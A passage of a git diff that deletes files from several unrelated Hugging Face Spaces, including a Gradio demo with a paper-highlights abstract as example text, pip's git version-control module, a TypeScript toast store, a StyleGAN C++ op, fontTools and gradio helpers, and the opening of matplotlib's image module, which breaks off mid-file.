Highlights are short sentences used to annotate scientific papers. They complement the abstract content by conveying the main result findings. To automate the process of paper annotation, highlights extraction aims at extracting from 3 to 5 paper sentences via supervised learning. Existing approaches rely on ad hoc linguistic features, which depend on the analyzed context, and apply recurrent neural networks, which are not effective in learning long-range text dependencies. This paper leverages the attention mechanism adopted in transformer models to improve the accuracy of sentence relevance estimation. Unlike existing approaches, it relies on the end-to-end training of a deep regression model. To attend patterns relevant to highlights content it also enriches sentence encodings with a section-level contextualization. The experimental results, achieved on three different benchmark datasets, show that the designed architecture is able to achieve significant performance improvements compared to the state-of-the-art. "] -] - -demo = gr.Interface( - fn=generate, - inputs=gr.inputs.Textbox(lines=10, - label="Input Text"), - outputs=gr.outputs.Textbox(label="Generated Text"), - examples=examples -) - -demo.launch() diff --git a/spaces/pkiage/fast_arbitrary_image_style_transfer/src/model/__init__.py b/spaces/pkiage/fast_arbitrary_image_style_transfer/src/model/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/vcs/git.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/vcs/git.py deleted file mode 100644 index 8d1d499376744954308bdf96f80e5b5a39a24195..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/vcs/git.py +++ /dev/null @@ -1,526 +0,0 @@ -import logging -import os.path -import pathlib -import re -import urllib.parse -import urllib.request -from typing import List, Optional, Tuple - -from pip._internal.exceptions import BadCommand, InstallationError -from pip._internal.utils.misc import HiddenText, display_path, hide_url -from pip._internal.utils.subprocess import make_command -from pip._internal.vcs.versioncontrol import ( - AuthInfo, - RemoteNotFoundError, - RemoteNotValidError, - RevOptions, - VersionControl, - find_path_to_project_root_from_repo_root, - vcs, -) - -urlsplit = urllib.parse.urlsplit -urlunsplit = urllib.parse.urlunsplit - - -logger = logging.getLogger(__name__) - - -GIT_VERSION_REGEX = re.compile( - r"^git version " # Prefix. - r"(\d+)" # Major. - r"\.(\d+)" # Dot, minor. - r"(?:\.(\d+))?" # Optional dot, patch. - r".*$" # Suffix, including any pre- and post-release segments we don't care about. -) - -HASH_REGEX = re.compile("^[a-fA-F0-9]{40}$") - -# SCP (Secure copy protocol) shorthand. e.g. 'git@example.com:foo/bar.git' -SCP_REGEX = re.compile( - r"""^ - # Optional user, e.g. 'git@' - (\w+@)? - # Server, e.g. 'github.com'. - ([^/:]+): - # The server-side path. e.g. 'user/project.git'. Must start with an - # alphanumeric character so as not to be confusable with a Windows paths - # like 'C:/foo/bar' or 'C:\foo\bar'. - (\w[^:]*) - $""", - re.VERBOSE, -) - - -def looks_like_hash(sha: str) -> bool: - return bool(HASH_REGEX.match(sha)) - - -class Git(VersionControl): - name = "git" - dirname = ".git" - repo_name = "clone" - schemes = ( - "git+http", - "git+https", - "git+ssh", - "git+git", - "git+file", - ) - # Prevent the user's environment variables from interfering with pip: - # https://github.com/pypa/pip/issues/1130 - unset_environ = ("GIT_DIR", "GIT_WORK_TREE") - default_arg_rev = "HEAD" - - @staticmethod - def get_base_rev_args(rev: str) -> List[str]: - return [rev] - - def is_immutable_rev_checkout(self, url: str, dest: str) -> bool: - _, rev_options = self.get_url_rev_options(hide_url(url)) - if not rev_options.rev: - return False - if not self.is_commit_id_equal(dest, rev_options.rev): - # the current commit is different from rev, - # which means rev was something else than a commit hash - return False - # return False in the rare case rev is both a commit hash - # and a tag or a branch; we don't want to cache in that case - # because that branch/tag could point to something else in the future - is_tag_or_branch = bool(self.get_revision_sha(dest, rev_options.rev)[0]) - return not is_tag_or_branch - - def get_git_version(self) -> Tuple[int, ...]: - version = self.run_command( - ["version"], - command_desc="git version", - show_stdout=False, - stdout_only=True, - ) - match = GIT_VERSION_REGEX.match(version) - if not match: - logger.warning("Can't parse git version: %s", version) - return () - return tuple(int(c) for c in match.groups()) - - @classmethod - def get_current_branch(cls, location: str) -> Optional[str]: - """ - Return the current branch, or None if HEAD isn't at a branch - (e.g. detached HEAD). - """ - # git-symbolic-ref exits with empty stdout if "HEAD" is a detached - # HEAD rather than a symbolic ref. In addition, the -q causes the - # command to exit with status code 1 instead of 128 in this case - # and to suppress the message to stderr. - args = ["symbolic-ref", "-q", "HEAD"] - output = cls.run_command( - args, - extra_ok_returncodes=(1,), - show_stdout=False, - stdout_only=True, - cwd=location, - ) - ref = output.strip() - - if ref.startswith("refs/heads/"): - return ref[len("refs/heads/") :] - - return None - - @classmethod - def get_revision_sha(cls, dest: str, rev: str) -> Tuple[Optional[str], bool]: - """ - Return (sha_or_none, is_branch), where sha_or_none is a commit hash - if the revision names a remote branch or tag, otherwise None. - - Args: - dest: the repository directory. - rev: the revision name. - """ - # Pass rev to pre-filter the list. - output = cls.run_command( - ["show-ref", rev], - cwd=dest, - show_stdout=False, - stdout_only=True, - on_returncode="ignore", - ) - refs = {} - # NOTE: We do not use splitlines here since that would split on other - # unicode separators, which can be maliciously used to install a - # different revision. - for line in output.strip().split("\n"): - line = line.rstrip("\r") - if not line: - continue - try: - ref_sha, ref_name = line.split(" ", maxsplit=2) - except ValueError: - # Include the offending line to simplify troubleshooting if - # this error ever occurs. - raise ValueError(f"unexpected show-ref line: {line!r}") - - refs[ref_name] = ref_sha - - branch_ref = f"refs/remotes/origin/{rev}" - tag_ref = f"refs/tags/{rev}" - - sha = refs.get(branch_ref) - if sha is not None: - return (sha, True) - - sha = refs.get(tag_ref) - - return (sha, False) - - @classmethod - def _should_fetch(cls, dest: str, rev: str) -> bool: - """ - Return true if rev is a ref or is a commit that we don't have locally. - - Branches and tags are not considered in this method because they are - assumed to be always available locally (which is a normal outcome of - ``git clone`` and ``git fetch --tags``). - """ - if rev.startswith("refs/"): - # Always fetch remote refs. - return True - - if not looks_like_hash(rev): - # Git fetch would fail with abbreviated commits. - return False - - if cls.has_commit(dest, rev): - # Don't fetch if we have the commit locally. - return False - - return True - - @classmethod - def resolve_revision( - cls, dest: str, url: HiddenText, rev_options: RevOptions - ) -> RevOptions: - """ - Resolve a revision to a new RevOptions object with the SHA1 of the - branch, tag, or ref if found. - - Args: - rev_options: a RevOptions object. - """ - rev = rev_options.arg_rev - # The arg_rev property's implementation for Git ensures that the - # rev return value is always non-None. - assert rev is not None - - sha, is_branch = cls.get_revision_sha(dest, rev) - - if sha is not None: - rev_options = rev_options.make_new(sha) - rev_options.branch_name = rev if is_branch else None - - return rev_options - - # Do not show a warning for the common case of something that has - # the form of a Git commit hash. - if not looks_like_hash(rev): - logger.warning( - "Did not find branch or tag '%s', assuming revision or ref.", - rev, - ) - - if not cls._should_fetch(dest, rev): - return rev_options - - # fetch the requested revision - cls.run_command( - make_command("fetch", "-q", url, rev_options.to_args()), - cwd=dest, - ) - # Change the revision to the SHA of the ref we fetched - sha = cls.get_revision(dest, rev="FETCH_HEAD") - rev_options = rev_options.make_new(sha) - - return rev_options - - @classmethod - def is_commit_id_equal(cls, dest: str, name: Optional[str]) -> bool: - """ - Return whether the current commit hash equals the given name. - - Args: - dest: the repository directory. - name: a string name. - """ - if not name: - # Then avoid an unnecessary subprocess call. - return False - - return cls.get_revision(dest) == name - - def fetch_new( - self, dest: str, url: HiddenText, rev_options: RevOptions, verbosity: int - ) -> None: - rev_display = rev_options.to_display() - logger.info("Cloning %s%s to %s", url, rev_display, display_path(dest)) - if verbosity <= 0: - flags: Tuple[str, ...] = ("--quiet",) - elif verbosity == 1: - flags = () - else: - flags = ("--verbose", "--progress") - if self.get_git_version() >= (2, 17): - # Git added support for partial clone in 2.17 - # https://git-scm.com/docs/partial-clone - # Speeds up cloning by functioning without a complete copy of repository - self.run_command( - make_command( - "clone", - "--filter=blob:none", - *flags, - url, - dest, - ) - ) - else: - self.run_command(make_command("clone", *flags, url, dest)) - - if rev_options.rev: - # Then a specific revision was requested. - rev_options = self.resolve_revision(dest, url, rev_options) - branch_name = getattr(rev_options, "branch_name", None) - logger.debug("Rev options %s, branch_name %s", rev_options, branch_name) - if branch_name is None: - # Only do a checkout if the current commit id doesn't match - # the requested revision. - if not self.is_commit_id_equal(dest, rev_options.rev): - cmd_args = make_command( - "checkout", - "-q", - rev_options.to_args(), - ) - self.run_command(cmd_args, cwd=dest) - elif self.get_current_branch(dest) != branch_name: - # Then a specific branch was requested, and that branch - # is not yet checked out. - track_branch = f"origin/{branch_name}" - cmd_args = [ - "checkout", - "-b", - branch_name, - "--track", - track_branch, - ] - self.run_command(cmd_args, cwd=dest) - else: - sha = self.get_revision(dest) - rev_options = rev_options.make_new(sha) - - logger.info("Resolved %s to commit %s", url, rev_options.rev) - - #: repo may contain submodules - self.update_submodules(dest) - - def switch(self, dest: str, url: HiddenText, rev_options: RevOptions) -> None: - self.run_command( - make_command("config", "remote.origin.url", url), - cwd=dest, - ) - cmd_args = make_command("checkout", "-q", rev_options.to_args()) - self.run_command(cmd_args, cwd=dest) - - self.update_submodules(dest) - - def update(self, dest: str, url: HiddenText, rev_options: RevOptions) -> None: - # First fetch changes from the default remote - if self.get_git_version() >= (1, 9): - # fetch tags in addition to everything else - self.run_command(["fetch", "-q", "--tags"], cwd=dest) - else: - self.run_command(["fetch", "-q"], cwd=dest) - # Then reset to wanted revision (maybe even origin/master) - rev_options = self.resolve_revision(dest, url, rev_options) - cmd_args = make_command("reset", "--hard", "-q", rev_options.to_args()) - self.run_command(cmd_args, cwd=dest) - #: update submodules - self.update_submodules(dest) - - @classmethod - def get_remote_url(cls, location: str) -> str: - """ - Return URL of the first remote encountered. - - Raises RemoteNotFoundError if the repository does not have a remote - url configured. - """ - # We need to pass 1 for extra_ok_returncodes since the command - # exits with return code 1 if there are no matching lines. - stdout = cls.run_command( - ["config", "--get-regexp", r"remote\..*\.url"], - extra_ok_returncodes=(1,), - show_stdout=False, - stdout_only=True, - cwd=location, - ) - remotes = stdout.splitlines() - try: - found_remote = remotes[0] - except IndexError: - raise RemoteNotFoundError - - for remote in remotes: - if remote.startswith("remote.origin.url "): - found_remote = remote - break - url = found_remote.split(" ")[1] - return cls._git_remote_to_pip_url(url.strip()) - - @staticmethod - def _git_remote_to_pip_url(url: str) -> str: - """ - Convert a remote url from what git uses to what pip accepts. - - There are 3 legal forms **url** may take: - - 1. A fully qualified url: ssh://git@example.com/foo/bar.git - 2. A local project.git folder: /path/to/bare/repository.git - 3. SCP shorthand for form 1: git@example.com:foo/bar.git - - Form 1 is output as-is. Form 2 must be converted to URI and form 3 must - be converted to form 1. - - See the corresponding test test_git_remote_url_to_pip() for examples of - sample inputs/outputs. - """ - if re.match(r"\w+://", url): - # This is already valid. Pass it though as-is. - return url - if os.path.exists(url): - # A local bare remote (git clone --mirror). - # Needs a file:// prefix. - return pathlib.PurePath(url).as_uri() - scp_match = SCP_REGEX.match(url) - if scp_match: - # Add an ssh:// prefix and replace the ':' with a '/'. - return scp_match.expand(r"ssh://\1\2/\3") - # Otherwise, bail out. - raise RemoteNotValidError(url) - - @classmethod - def has_commit(cls, location: str, rev: str) -> bool: - """ - Check if rev is a commit that is available in the local repository. - """ - try: - cls.run_command( - ["rev-parse", "-q", "--verify", "sha^" + rev], - cwd=location, - log_failed_cmd=False, - ) - except InstallationError: - return False - else: - return True - - @classmethod - def get_revision(cls, location: str, rev: Optional[str] = None) -> str: - if rev is None: - rev = "HEAD" - current_rev = cls.run_command( - ["rev-parse", rev], - show_stdout=False, - stdout_only=True, - cwd=location, - ) - return current_rev.strip() - - @classmethod - def get_subdirectory(cls, location: str) -> Optional[str]: - """ - Return the path to Python project root, relative to the repo root. - Return None if the project root is in the repo root. - """ - # find the repo root - git_dir = cls.run_command( - ["rev-parse", "--git-dir"], - show_stdout=False, - stdout_only=True, - cwd=location, - ).strip() - if not os.path.isabs(git_dir): - git_dir = os.path.join(location, git_dir) - repo_root = os.path.abspath(os.path.join(git_dir, "..")) - return find_path_to_project_root_from_repo_root(location, repo_root) - - @classmethod - def get_url_rev_and_auth(cls, url: str) -> Tuple[str, Optional[str], AuthInfo]: - """ - Prefixes stub URLs like 'user@hostname:user/repo.git' with 'ssh://'. - That's required because although they use SSH they sometimes don't - work with a ssh:// scheme (e.g. GitHub). But we need a scheme for - parsing. Hence we remove it again afterwards and return it as a stub. - """ - # Works around an apparent Git bug - # (see https://article.gmane.org/gmane.comp.version-control.git/146500) - scheme, netloc, path, query, fragment = urlsplit(url) - if scheme.endswith("file"): - initial_slashes = path[: -len(path.lstrip("/"))] - newpath = initial_slashes + urllib.request.url2pathname(path).replace( - "\\", "/" - ).lstrip("/") - after_plus = scheme.find("+") + 1 - url = scheme[:after_plus] + urlunsplit( - (scheme[after_plus:], netloc, newpath, query, fragment), - ) - - if "://" not in url: - assert "file:" not in url - url = url.replace("git+", "git+ssh://") - url, rev, user_pass = super().get_url_rev_and_auth(url) - url = url.replace("ssh://", "") - else: - url, rev, user_pass = super().get_url_rev_and_auth(url) - - return url, rev, user_pass - - @classmethod - def update_submodules(cls, location: str) -> None: - if not os.path.exists(os.path.join(location, ".gitmodules")): - return - cls.run_command( - ["submodule", "update", "--init", "--recursive", "-q"], - cwd=location, - ) - - @classmethod - def get_repository_root(cls, location: str) -> Optional[str]: - loc = super().get_repository_root(location) - if loc: - return loc - try: - r = cls.run_command( - ["rev-parse", "--show-toplevel"], - cwd=location, - show_stdout=False, - stdout_only=True, - on_returncode="raise", - log_failed_cmd=False, - ) - except BadCommand: - logger.debug( - "could not determine if %s is under git control " - "because git is not available", - location, - ) - return None - except InstallationError: - return None - return os.path.normpath(r.rstrip("\r\n")) - - @staticmethod - def should_add_vcs_url_prefix(repo_url: str) -> bool: - """In either https or ssh form, requirements must be prefixed with git+.""" - return True - - -vcs.register(Git) diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/themes.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/themes.py deleted file mode 100644 index bf6db104a2c4fd4f3dc699e85f2b262c3d31e9a0..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/themes.py +++ /dev/null @@ -1,5 +0,0 @@ -from .default_styles import DEFAULT_STYLES -from .theme import Theme - - -DEFAULT = Theme(DEFAULT_STYLES) diff --git a/spaces/plzdontcry/dakubettergpt/src/store/toast-slice.ts b/spaces/plzdontcry/dakubettergpt/src/store/toast-slice.ts deleted file mode 100644 index e3a9d807e16a262ef3de002a816f7a9c0a9d8b45..0000000000000000000000000000000000000000 --- a/spaces/plzdontcry/dakubettergpt/src/store/toast-slice.ts +++ /dev/null @@ -1,26 +0,0 @@ -import { ToastStatus } from '@components/Toast/Toast'; -import { StoreSlice } from './store'; - -export interface ToastSlice { - toastShow: boolean; - toastMessage: string; - toastStatus: ToastStatus; - setToastShow: (toastShow: boolean) => void; - setToastMessage: (toastMessage: string) => void; - setToastStatus: (toastStatus: ToastStatus) => void; -} - -export const createToastSlice: StoreSlice = (set, get) => ({ - toastShow: false, - toastMessage: '', - toastStatus: 'success', - setToastShow: (toastShow: boolean) => { - set((prev) => ({ ...prev, toastShow })); - }, - setToastMessage: (toastMessage: string) => { - set((prev: ToastSlice) => ({ ...prev, toastMessage })); - }, - setToastStatus: (toastStatus: ToastStatus) => { - set((prev: ToastSlice) => ({ ...prev, toastStatus })); - }, -}); diff --git a/spaces/power2/JoJoGan-powerhow2/e4e/models/stylegan2/op/upfirdn2d.cpp b/spaces/power2/JoJoGan-powerhow2/e4e/models/stylegan2/op/upfirdn2d.cpp deleted file mode 100644 index d2e633dc896433c205e18bc3e455539192ff968e..0000000000000000000000000000000000000000 --- a/spaces/power2/JoJoGan-powerhow2/e4e/models/stylegan2/op/upfirdn2d.cpp +++ /dev/null @@ -1,23 +0,0 @@ -#include - - -torch::Tensor upfirdn2d_op(const torch::Tensor& input, const torch::Tensor& kernel, - int up_x, int up_y, int down_x, int down_y, - int pad_x0, int pad_x1, int pad_y0, int pad_y1); - -#define CHECK_CUDA(x) TORCH_CHECK(x.type().is_cuda(), #x " must be a CUDA tensor") -#define CHECK_CONTIGUOUS(x) TORCH_CHECK(x.is_contiguous(), #x " must be contiguous") -#define CHECK_INPUT(x) CHECK_CUDA(x); CHECK_CONTIGUOUS(x) - -torch::Tensor upfirdn2d(const torch::Tensor& input, const torch::Tensor& kernel, - int up_x, int up_y, int down_x, int down_y, - int pad_x0, int pad_x1, int pad_y0, int pad_y1) { - CHECK_CUDA(input); - CHECK_CUDA(kernel); - - return upfirdn2d_op(input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1); -} - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) { - m.def("upfirdn2d", &upfirdn2d, "upfirdn2d (CUDA)"); -} \ No newline at end of file diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py deleted file mode 100644 index efb2b2d14cc46dc51ff795cf7a1fb95bd6d63673..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py +++ /dev/null @@ -1,69 +0,0 @@ -# -*- coding: utf-8 -*- -"""Calculate the perimeter of a glyph.""" - -from fontTools.pens.basePen import BasePen -from fontTools.misc.bezierTools import ( - approximateQuadraticArcLengthC, - calcQuadraticArcLengthC, - approximateCubicArcLengthC, - calcCubicArcLengthC, -) -import math - - -__all__ = ["PerimeterPen"] - - -def _distance(p0, p1): - return math.hypot(p0[0] - p1[0], p0[1] - p1[1]) - - -class PerimeterPen(BasePen): - def __init__(self, glyphset=None, tolerance=0.005): - BasePen.__init__(self, glyphset) - self.value = 0 - self.tolerance = tolerance - - # Choose which algorithm to use for quadratic and for cubic. - # Quadrature is faster but has fixed error characteristic with no strong - # error bound. The cutoff points are derived empirically. - self._addCubic = ( - self._addCubicQuadrature if tolerance >= 0.0015 else self._addCubicRecursive - ) - self._addQuadratic = ( - self._addQuadraticQuadrature - if tolerance >= 0.00075 - else self._addQuadraticExact - ) - - def _moveTo(self, p0): - self.__startPoint = p0 - - def _closePath(self): - p0 = self._getCurrentPoint() - if p0 != self.__startPoint: - self._lineTo(self.__startPoint) - - def _lineTo(self, p1): - p0 = self._getCurrentPoint() - self.value += _distance(p0, p1) - - def _addQuadraticExact(self, c0, c1, c2): - self.value += calcQuadraticArcLengthC(c0, c1, c2) - - def _addQuadraticQuadrature(self, c0, c1, c2): - self.value += approximateQuadraticArcLengthC(c0, c1, c2) - - def _qCurveToOne(self, p1, p2): - p0 = self._getCurrentPoint() - self._addQuadratic(complex(*p0), complex(*p1), complex(*p2)) - - def _addCubicRecursive(self, c0, c1, c2, c3): - self.value += calcCubicArcLengthC(c0, c1, c2, c3, self.tolerance) - - def _addCubicQuadrature(self, c0, c1, c2, c3): - self.value += approximateCubicArcLengthC(c0, c1, c2, c3) - - def _curveToOne(self, p1, p2, p3): - p0 = self._getCurrentPoint() - self._addCubic(complex(*p0), complex(*p1), complex(*p2), complex(*p3)) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/tables/_l_c_a_r.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/tables/_l_c_a_r.py deleted file mode 100644 index 1323b670d0c2e7a51e553ee8aa341af789898b1d..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/tables/_l_c_a_r.py +++ /dev/null @@ -1,5 +0,0 @@ -from .otBase import BaseTTXConverter - - -class table__l_c_a_r(BaseTTXConverter): - pass diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/themes/utils/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/themes/utils/__init__.py deleted file mode 100644 index a3e6208634fafa416b9323f5156ac56dd7bb3700..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/themes/utils/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -from .semver_match import ( - ThemeAsset, - get_matching_version, - get_theme_assets, -) - -__all__ = [ - "ThemeAsset", - "get_theme_assets", - "get_matching_version", -] diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/matplotlib/image.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/matplotlib/image.py deleted file mode 100644 index 757f0ba3476e3b74f7da9dc15b64f1a3102f625b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/matplotlib/image.py +++ /dev/null @@ -1,1785 +0,0 @@ -""" -The image module supports basic image loading, rescaling and display -operations. -""" - -import math -import os -import logging -from pathlib import Path -import warnings - -import numpy as np -import PIL.Image -import PIL.PngImagePlugin - -import matplotlib as mpl -from matplotlib import _api, cbook, cm -# For clarity, names from _image are given explicitly in this module -from matplotlib import _image -# For user convenience, the names from _image are also imported into -# the image namespace -from matplotlib._image import * -import matplotlib.artist as martist -from matplotlib.backend_bases import FigureCanvasBase -import matplotlib.colors as mcolors -from matplotlib.transforms import ( - Affine2D, BboxBase, Bbox, BboxTransform, BboxTransformTo, - IdentityTransform, TransformedBbox) - -_log = logging.getLogger(__name__) - -# map interpolation strings to module constants -_interpd_ = { - 'antialiased': _image.NEAREST, # this will use nearest or Hanning... - 'none': _image.NEAREST, # fall back to nearest when not supported - 'nearest': _image.NEAREST, - 'bilinear': _image.BILINEAR, - 'bicubic': _image.BICUBIC, - 'spline16': _image.SPLINE16, - 'spline36': _image.SPLINE36, - 'hanning': _image.HANNING, - 'hamming': _image.HAMMING, - 'hermite': _image.HERMITE, - 'kaiser': _image.KAISER, - 'quadric': _image.QUADRIC, - 'catrom': _image.CATROM, - 'gaussian': _image.GAUSSIAN, - 'bessel': _image.BESSEL, - 'mitchell': _image.MITCHELL, - 'sinc': _image.SINC, - 'lanczos': _image.LANCZOS, - 'blackman': _image.BLACKMAN, -} - -interpolations_names = set(_interpd_) - - -def composite_images(images, renderer, magnification=1.0): - """ - Composite a number of RGBA images into one. The images are - composited in the order in which they appear in the *images* list. - - Parameters - ---------- - images : list of Images - Each must have a `make_image` method. For each image, - `can_composite` should return `True`, though this is not - enforced by this function. Each image must have a purely - affine transformation with no shear. - - renderer : `.RendererBase` - - magnification : float, default: 1 - The additional magnification to apply for the renderer in use. - - Returns - ------- - image : (M, N, 4) `numpy.uint8` array - The composited RGBA image. - offset_x, offset_y : float - The (left, bottom) offset where the composited image should be placed - in the output figure. - """ - if len(images) == 0: - return np.empty((0, 0, 4), dtype=np.uint8), 0, 0 - - parts = [] - bboxes = [] - for image in images: - data, x, y, trans = image.make_image(renderer, magnification) - if data is not None: - x *= magnification - y *= magnification - parts.append((data, x, y, image._get_scalar_alpha())) - bboxes.append( - Bbox([[x, y], [x + data.shape[1], y + data.shape[0]]])) - - if len(parts) == 0: - return np.empty((0, 0, 4), dtype=np.uint8), 0, 0 - - bbox = Bbox.union(bboxes) - - output = np.zeros( - (int(bbox.height), int(bbox.width), 4), dtype=np.uint8) - - for data, x, y, alpha in parts: - trans = Affine2D().translate(x - bbox.x0, y - bbox.y0) - _image.resample(data, output, trans, _image.NEAREST, - resample=False, alpha=alpha) - - return output, bbox.x0 / magnification, bbox.y0 / magnification - - -def _draw_list_compositing_images( - renderer, parent, artists, suppress_composite=None): - """ - Draw a sorted list of artists, compositing images into a single - image where possible. - - For internal Matplotlib use only: It is here to reduce duplication - between `Figure.draw` and `Axes.draw`, but otherwise should not be - generally useful. - """ - has_images = any(isinstance(x, _ImageBase) for x in artists) - - # override the renderer default if suppressComposite is not None - not_composite = (suppress_composite if suppress_composite is not None - else renderer.option_image_nocomposite()) - - if not_composite or not has_images: - for a in artists: - a.draw(renderer) - else: - # Composite any adjacent images together - image_group = [] - mag = renderer.get_image_magnification() - - def flush_images(): - if len(image_group) == 1: - image_group[0].draw(renderer) - elif len(image_group) > 1: - data, l, b = composite_images(image_group, renderer, mag) - if data.size != 0: - gc = renderer.new_gc() - gc.set_clip_rectangle(parent.bbox) - gc.set_clip_path(parent.get_clip_path()) - renderer.draw_image(gc, round(l), round(b), data) - gc.restore() - del image_group[:] - - for a in artists: - if (isinstance(a, _ImageBase) and a.can_composite() and - a.get_clip_on() and not a.get_clip_path()): - image_group.append(a) - else: - flush_images() - a.draw(renderer) - flush_images() - - -def _resample( - image_obj, data, out_shape, transform, *, resample=None, alpha=1): - """ - Convenience wrapper around `._image.resample` to resample *data* to - *out_shape* (with a third dimension if *data* is RGBA) that takes care of - allocating the output array and fetching the relevant properties from the - Image object *image_obj*. - """ - # AGG can only handle coordinates smaller than 24-bit signed integers, - # so raise errors if the input data is larger than _image.resample can - # handle. - msg = ('Data with more than {n} cannot be accurately displayed. ' - 'Downsampling to less than {n} before displaying. ' - 'To remove this warning, manually downsample your data.') - if data.shape[1] > 2**23: - warnings.warn(msg.format(n='2**23 columns')) - step = int(np.ceil(data.shape[1] / 2**23)) - data = data[:, ::step] - transform = Affine2D().scale(step, 1) + transform - if data.shape[0] > 2**24: - warnings.warn(msg.format(n='2**24 rows')) - step = int(np.ceil(data.shape[0] / 2**24)) - data = data[::step, :] - transform = Affine2D().scale(1, step) + transform - # decide if we need to apply anti-aliasing if the data is upsampled: - # compare the number of displayed pixels to the number of - # the data pixels. - interpolation = image_obj.get_interpolation() - if interpolation == 'antialiased': - # don't antialias if upsampling by an integer number or - # if zooming in more than a factor of 3 - pos = np.array([[0, 0], [data.shape[1], data.shape[0]]]) - disp = transform.transform(pos) - dispx = np.abs(np.diff(disp[:, 0])) - dispy = np.abs(np.diff(disp[:, 1])) - if ((dispx > 3 * data.shape[1] or - dispx == data.shape[1] or - dispx == 2 * data.shape[1]) and - (dispy > 3 * data.shape[0] or - dispy == data.shape[0] or - dispy == 2 * data.shape[0])): - interpolation = 'nearest' - else: - interpolation = 'hanning' - out = np.zeros(out_shape + data.shape[2:], data.dtype) # 2D->2D, 3D->3D. - if resample is None: - resample = image_obj.get_resample() - _image.resample(data, out, transform, - _interpd_[interpolation], - resample, - alpha, - image_obj.get_filternorm(), - image_obj.get_filterrad()) - return out - - -def _rgb_to_rgba(A): - """ - Convert an RGB image to RGBA, as required by the image resample C++ - extension. - """ - rgba = np.zeros((A.shape[0], A.shape[1], 4), dtype=A.dtype) - rgba[:, :, :3] = A - if rgba.dtype == np.uint8: - rgba[:, :, 3] = 255 - else: - rgba[:, :, 3] = 1.0 - return rgba - - -class _ImageBase(martist.Artist, cm.ScalarMappable): - """ - Base class for images. - - interpolation and cmap default to their rc settings - - cmap is a colors.Colormap instance - norm is a colors.Normalize instance to map luminance to 0-1 - - extent is data axes (left, right, bottom, top) for making image plots - registered with data plots. Default is to label the pixel - centers with the zero-based row and column indices. - - Additional kwargs are matplotlib.artist properties - """ - zorder = 0 - - def __init__(self, ax, - cmap=None, - norm=None, - interpolation=None, - origin=None, - filternorm=True, - filterrad=4.0, - resample=False, - *, - interpolation_stage=None, - **kwargs - ): - martist.Artist.__init__(self) - cm.ScalarMappable.__init__(self, norm, cmap) - if origin is None: - origin = mpl.rcParams['image.origin'] - _api.check_in_list(["upper", "lower"], origin=origin) - self.origin = origin - self.set_filternorm(filternorm) - self.set_filterrad(filterrad) - self.set_interpolation(interpolation) - self.set_interpolation_stage(interpolation_stage) - self.set_resample(resample) - self.axes = ax - - self._imcache = None - - self._internal_update(kwargs) - - def __str__(self): - try: - shape = self.get_shape() - return f"{type(self).__name__}(shape={shape!r})" - except RuntimeError: - return type(self).__name__ - - def __getstate__(self): - # Save some space on the pickle by not saving the cache. - return {**super().__getstate__(), "_imcache": None} - - def get_size(self): - """Return the size of the image as tuple (numrows, numcols).""" - return self.get_shape()[:2] - - def get_shape(self): - """ - Return the shape of the image as tuple (numrows, numcols, channels). - """ - if self._A is None: - raise RuntimeError('You must first set the image array') - - return self._A.shape - - def set_alpha(self, alpha): - """ - Set the alpha value used for blending - not supported on all backends. - - Parameters - ---------- - alpha : float or 2D array-like or None - """ - martist.Artist._set_alpha_for_array(self, alpha) - if np.ndim(alpha) not in (0, 2): - raise TypeError('alpha must be a float, two-dimensional ' - 'array, or None') - self._imcache = None - - def _get_scalar_alpha(self): - """ - Get a scalar alpha value to be applied to the artist as a whole. - - If the alpha value is a matrix, the method returns 1.0 because pixels - have individual alpha values (see `~._ImageBase._make_image` for - details). If the alpha value is a scalar, the method returns said value - to be applied to the artist as a whole because pixels do not have - individual alpha values. - """ - return 1.0 if self._alpha is None or np.ndim(self._alpha) > 0 \ - else self._alpha - - def changed(self): - """ - Call this whenever the mappable is changed so observers can update. - """ - self._imcache = None - cm.ScalarMappable.changed(self) - - def _make_image(self, A, in_bbox, out_bbox, clip_bbox, magnification=1.0, - unsampled=False, round_to_pixel_border=True): - """ - Normalize, rescale, and colormap the image *A* from the given *in_bbox* - (in data space), to the given *out_bbox* (in pixel space) clipped to - the given *clip_bbox* (also in pixel space), and magnified by the - *magnification* factor. - - *A* may be a greyscale image (M, N) with a dtype of `~numpy.float32`, - `~numpy.float64`, `~numpy.float128`, `~numpy.uint16` or `~numpy.uint8`, - or an (M, N, 4) RGBA image with a dtype of `~numpy.float32`, - `~numpy.float64`, `~numpy.float128`, or `~numpy.uint8`. - - If *unsampled* is True, the image will not be scaled, but an - appropriate affine transformation will be returned instead. - - If *round_to_pixel_border* is True, the output image size will be - rounded to the nearest pixel boundary. This makes the images align - correctly with the 